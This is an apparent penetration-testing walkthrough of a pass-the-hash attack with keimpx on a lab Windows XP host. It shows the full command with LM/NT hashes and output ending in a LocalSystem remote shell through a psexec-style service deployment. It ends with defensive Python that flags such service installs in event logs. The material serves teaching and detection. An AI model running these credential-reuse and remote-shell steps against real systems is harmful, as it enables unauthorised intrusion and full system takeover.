The test target is a Windows XP machine at 192.168.1.5. Because it is not a domain member, I first turned off the firewall and disabled Simple File Sharing (My Documents -> Tools -> Folder Options -> View -> untick "Use simple file sharing"). The second step matters: on a workgroup XP box with Simple File Sharing enabled, every network logon is forced to Guest (ForceGuest), so authenticating over SMB as a real local account, whether with its password or with its hash, would not yield administrative access.
Run the command:
root@bt:/pentest/passwords/keimpx# ./keimpx.py -t 192.168.1.5 -v 1 -p 445 -U iishelp --nt=ccf9155e3e7db453aad3b435b51404ee --lm=3dbde697d71690a769204beb12283678
One thing worth checking before running this: the value given to --nt ends in aad3b435b51404ee, which is the DES block an LM hash carries for an empty 7-byte half, and an NT hash (MD4 of the UTF-16LE password) never has that shape. The pair was most likely dumped in LM:NT order and pasted into the two flags the other way round, so compare the order against your dump; keimpx prints results as user/LM:NT, which makes the comparison easy.
Output (my selections and typed commands are the lines after the `>` and `#` prompts):
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library
keimpx 0.2
by Bernardo Damele A. G. <bernardo.damele@gmail.com>
[13:46:20] [INFO] Loading targets
[13:46:20] [INFO] Loading credentials
[13:46:20] [INFO] Loading domains
[13:46:20] [INFO] Loaded 1 unique targets
[13:46:20] [INFO] Loaded 1 unique credentials
[13:46:20] [INFO] No domains specified, using NULL domain
[13:46:20] [INFO] Attacking host 192.168.1.5:445
[13:46:20] [INFO] Valid credentials on 192.168.1.5:445: iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
[13:46:20] [INFO] Attack on host 192.168.1.5:445 finished
The credentials worked in total 1 times
TARGET SORTED RESULTS:
192.168.1.5:445
iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
USER SORTED RESULTS:
iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
192.168.1.5:445
Do you want to get a shell from any of the targets? [Y/n]
Which target do you want to connect to?
[1] 192.168.1.5:445
> 1
Which credentials do you want to use to connect?
[1] iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
> 1
[13:46:35] [INFO] type 'help' for help menu
# help
Generic options
===============
help - show this message
verbosity {level} - set verbosity level (0-2)
info - list system information
exit - terminates the SMB session and exit from the tool
Shares options
==============
shares - list available shares
use {sharename} - connect to an specific share
cd {path} - changes the current directory to {path}
pwd - shows current remote directory
ls {path} - lists all the files in the current directory
cat {file} - display content of the selected file
download {filename} - downloads the filename from the current path
upload {filename} - uploads the filename into the current path
mkdir {dirname} - creates the directory under the current path
rm {file} - removes the selected file
rmdir {dirname} - removes the directory under the current path
Services options
================
deploy {servicename} {localfile} [serviceargs] - deploy remotely a service executable
undeploy {servicename} {remotefile} - undeploy remotely a service executable
Shell options
=============
shell [port] - spawn a shell listening on a TCP port, by default 2090/tcp
Users options
=============
users [domain] - list users, optionally for a specific domain
pswpolicy [domain] - list password policy, optionally for a specific domain
domains - list domains to which the system is part of
Registry options (Soon)
================
regread {registrykey} - read a registry key
regwrite {registrykey} {registryvalue} - add a value to a registry key
regdelete {registrykey} - delete a registry key
# shell
[13:47:09] [INFO] Uploading the service executable to 'ADMIN$\urakxn.exe'
[13:47:09] [INFO] Connecting to the SVCCTL named pipe
[13:47:09] [INFO] Creating the service 'Ynohkb'
[13:47:09] [INFO] Starting the service 'Ynohkb'
[13:47:09] [INFO] Connecting to backdoor on port 2090, wait..
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
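What the `shell` command did above is the same sequence psexec-style tools use: the service executable is written to ADMIN$, which is the %SystemRoot% directory, a service with a random name is created and started through the SVCCTL named pipe, and keimpx then connects to the port that service opened (2090/tcp). The resulting prompt runs as LocalSystem. The side effects are a new service registration, an executable sitting directly in C:\WINDOWS, and a listener on 2090/tcp that anyone who can reach the host may also connect to, so check that the service and the dropped file are gone when you exit. From the defender's side, those artifacts are what to hunt for. The Python below is an added example, not keimpx code and not from the original post: it scores Event ID 7045 (service installed) records for the pattern above. The log lines are constructed and flattened to key=value text for the example; only the Ynohkb/urakxn.exe names come from the output on this page, the other entries and all timestamps are invented.

```python
# Added example (not keimpx code, not from the original post): flag service
# installs that look like a keimpx/psexec-style remote shell deployment.
import re

# Constructed System-log entries flattened to key=value text.
# EventID 7045 = "A service was installed in the system" (Service Control Manager).
SAMPLE_LOG = r"""
2011-03-02 13:40:01 EventID=7045 ServiceName=Print Spooler ImagePath=C:\WINDOWS\system32\spoolsv.exe StartType=auto start Account=LocalSystem
2011-03-02 13:47:09 EventID=7045 ServiceName=Ynohkb ImagePath=C:\WINDOWS\urakxn.exe StartType=demand start Account=LocalSystem
2011-03-02 13:47:09 EventID=7036 ServiceName=Ynohkb State=running
2011-03-02 14:02:33 EventID=7045 ServiceName=PSEXESVC ImagePath=C:\WINDOWS\PSEXESVC.exe StartType=demand start Account=LocalSystem
2011-03-02 14:10:00 EventID=7045 ServiceName=Backup Agent ImagePath=C:\Program Files\Vendor\agent.exe StartType=auto start Account=LocalSystem
"""

# Service names registered by well-known remote-exec tools (not exhaustive).
KNOWN_TOOL_SERVICES = {"psexesvc"}
# A binary directly in %SystemRoot% is where a file uploaded to ADMIN$ lands.
WINDOWS_ROOT_BINARY = re.compile(r"^[a-z]:\\windows\\[^\\]+\.exe$", re.IGNORECASE)
# key=value pairs whose values may contain spaces (lazy match up to the next key).
KV = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

def parse_event(line):
    """Split one flattened log line into (timestamp, {field: value})."""
    ts, rest = line[:19], line[20:]
    return ts, dict(KV.findall(rest))

def score_service_install(fields):
    """Return (score, reasons) for one EventID 7045 record."""
    reasons = []
    name = fields.get("ServiceName", "")
    path = fields.get("ImagePath", "")
    if name.lower() in KNOWN_TOOL_SERVICES:
        reasons.append("service name matches a known remote-exec tool")
    if WINDOWS_ROOT_BINARY.match(path):
        reasons.append("binary dropped directly in %SystemRoot% (ADMIN$)")
    if fields.get("StartType", "").lower().startswith("demand"):
        reasons.append("demand-start service (run once, not at boot)")
    if re.fullmatch(r"[A-Za-z]{5,8}", name) and name.lower() not in KNOWN_TOOL_SERVICES:
        reasons.append("short random-looking service name")
    return len(reasons), reasons

def find_suspicious_installs(log_text, threshold=2):
    """Return [(timestamp, service name, reasons)] for 7045 records at or above threshold."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, fields = parse_event(line)
        if fields.get("EventID") != "7045":
            continue
        score, reasons = score_service_install(fields)
        if score >= threshold:
            hits.append((ts, fields.get("ServiceName", ""), reasons))
    return hits

if __name__ == "__main__":
    for ts, name, reasons in find_suspicious_installs(SAMPLE_LOG):
        print(ts, name)
        for r in reasons:
            print("   -", r)
```

The name heuristic is the weakest signal on its own, which is why it only counts towards a score; the binary location and the demand-start type are what separate a dropped service from a legitimate install, and on a real network you would pair the 7045 record with the preceding network logon from the same source.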